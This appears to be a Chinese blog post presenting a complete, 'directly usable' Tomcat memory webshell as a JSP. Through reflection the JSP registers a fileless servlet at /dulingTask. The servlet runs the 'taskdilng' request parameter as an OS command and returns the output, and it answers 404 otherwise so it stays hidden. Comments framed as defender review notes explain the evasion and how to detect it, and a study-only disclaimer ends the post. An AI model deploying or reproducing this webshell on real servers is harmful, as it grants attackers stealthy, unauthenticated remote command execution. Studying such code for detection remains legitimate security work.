能直接使用的内存马学习-servlet篇

/**
* @Author novy
* @Date 2021/9/14 9:09
* @Version 1.0
*/

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import = "org.apache.catalina.core.ApplicationContext"%>
<%@ page import = "org.apache.catalina.core.StandardContext"%>
<%@ page import = "javax.servlet.*"%>
<%@ page import = "javax.servlet.annotation.WebServlet"%>
<%@ page import = "javax.servlet.http.HttpServlet"%>
<%@ page import = "javax.servlet.http.HttpServletRequest"%>
<%@ page import = "javax.servlet.http.HttpServletResponse"%>
<%@ page import = "java.io.IOException"%>
<%@ page import = "java.lang.reflect.Field"%>
<%@ page import = "java.io.InputStream"%>
<%@ page import = "java.io.BufferedReader"%>
<%@ page import = "java.io.InputStreamReader"%>


<%
/*
 * InitTaskServlet: a javax.servlet.Servlet implementation declared inside the JSP scriptlet,
 * so it is compiled as part of the JSP and has no class file or descriptor entry of its own
 * in the web application.
 *
 * service() reads the "taskdilng" request parameter. When the parameter is present its value
 * is handed to ProcessBuilder and started as an operating-system process, and the process's
 * standard output is written back line by line. When it is absent the servlet answers 404.
 * Nothing in the class authenticates the caller or validates the parameter, so whoever can
 * reach the mapped URL can start processes with the privileges of the servlet container.
 *
 * Review notes for defenders:
 * - Because a request without the parameter gets a 404, probing the URL alone does not
 *   reveal the servlet; the status code cannot be used to rule it out.
 * - Child processes started from the container's JVM are the most reliable runtime signal;
 *   alert on process creation whose parent is the application-server process.
 * - The parameter travels in the request, so it shows up in access logs only when it is sent
 *   in the query string - presumably request-body logging or a WAF is needed otherwise.
 * - Running the container as an unprivileged account limits what the started process can do.
 */
class InitTaskServlet implements Servlet{
// Lifecycle methods are deliberately empty: the servlet keeps no configuration or state.
@Override
public void init(ServletConfig config) throws ServletException {}
@Override
public String getServletInfo() {return null;}
@Override
public void destroy() {} public ServletConfig getServletConfig() {return null;}

/*
 * Handles every request routed to this servlet.
 * req / res are cast to their HTTP types without an instanceof check.
 * Throws IOException if starting the process or reading its output fails.
 */
@Override
public void service(ServletRequest req, ServletResponse res) throws ServletException, IOException {
HttpServletRequest request1 = (HttpServletRequest) req;
HttpServletResponse response1 = (HttpServletResponse) res;
// Untrusted input: taken straight from the request, never checked against an allow-list.
String task = request1.getParameter("taskdilng");
if (task != null){
// Process aa = Runtime.getRuntime().exec(task);
// Sink: the request parameter becomes the command of a new OS process.
InputStream fis = new ProcessBuilder(task).start().getInputStream();
// response1.setContentType("text/html");
// PrintWriter out = response1.getWriter();
// System.out.println("res: "+aa);
//InputStream fis=aa.getInputStream();
// No charset is given, so the platform default is used to decode the process output.
InputStreamReader isr=new InputStreamReader(fis);
BufferedReader br=new BufferedReader(isr);
String line=null;
// Each line of process output is written to a response writer with the prefix "res: ".
while((line=br.readLine())!=null) {
response.getWriter().println("res: "+line);
}
}
else{
// Without the parameter the endpoint answers as if the path did not exist.
response1.sendError(HttpServletResponse.SC_NOT_FOUND);
}
}
}
%>

<%
/*
 * Registers an InitTaskServlet instance in the running Tomcat context when this JSP is
 * requested. The registration is made against the live StandardContext object only: no
 * web.xml entry, no @WebServlet annotation and no class under WEB-INF is created by this code.
 *
 * Review notes for defenders:
 * - The precondition is that this JSP can be written into, and executed from, the web
 *   application. Controlling upload and write paths and disabling JSP execution where it is
 *   not needed removes that precondition.
 * - To find such a registration, list the servlets and mappings the running context actually
 *   holds (Tomcat normally exposes each Wrapper over JMX - verify on the version in use) and
 *   compare them with what the deployment descriptor and annotations declare. A servlet whose
 *   class name is a JSP-generated nested class is a strong indicator.
 * - Presumably the registration does not survive a context reload or container restart, since
 *   nothing here persists it; the JSP file and its compiled form may remain on disk as
 *   forensic artefacts - confirm before cleaning up.
 */
// Start from the public ServletContext handed out by the container.
ServletContext servletContext = request.getSession().getServletContext();
// Reflection step 1: read the private "context" field of that object; the cast below shows
// it is expected to hold Tomcat's internal ApplicationContext.
Field appctx = servletContext.getClass().getDeclaredField("context");
// setAccessible(true) suppresses Java access checks on the private field.
appctx.setAccessible(true);
ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext);
// Reflection step 2: read ApplicationContext's own "context" field to reach StandardContext,
// the object that owns the context's servlet registrations.
Field stdctx = applicationContext.getClass().getDeclaredField("context");
stdctx.setAccessible(true);
StandardContext standardContext = (StandardContext) stdctx.get(applicationContext);
InitTaskServlet initServlet = new InitTaskServlet();
// Build a Wrapper (Tomcat's container for one servlet) around the instance.
org.apache.catalina.Wrapper inittWrapper = standardContext.createWrapper();
inittWrapper.setName("inittPage");
inittWrapper.setLoadOnStartup(1);
inittWrapper.setServlet(initServlet);
inittWrapper.setServletClass(initServlet.getClass().getName());
// Attach the wrapper to the context and map it to a URL pattern; from here on requests to
// "/dulingTask" in this context are dispatched to the servlet above.
standardContext.addChild(inittWrapper);
standardContext.addServletMapping("/dulingTask", "inittPage");
// Marker text written to the JSP response once registration has completed without an exception.
out.println("susscess");
%>

参考:
JAVA本地命令执行-ProcessBuilder命令执行


声明:
本文章用于学习交流,严禁用于非法操作,出现后果一切自行承担,阅读此文章表示你已同意本声明。

Disclaimer:
This article is for study and communication. It is strictly forbidden to use it for illegal operations. All consequences shall be borne by yourself. Reading this article means that you have agreed to this statement.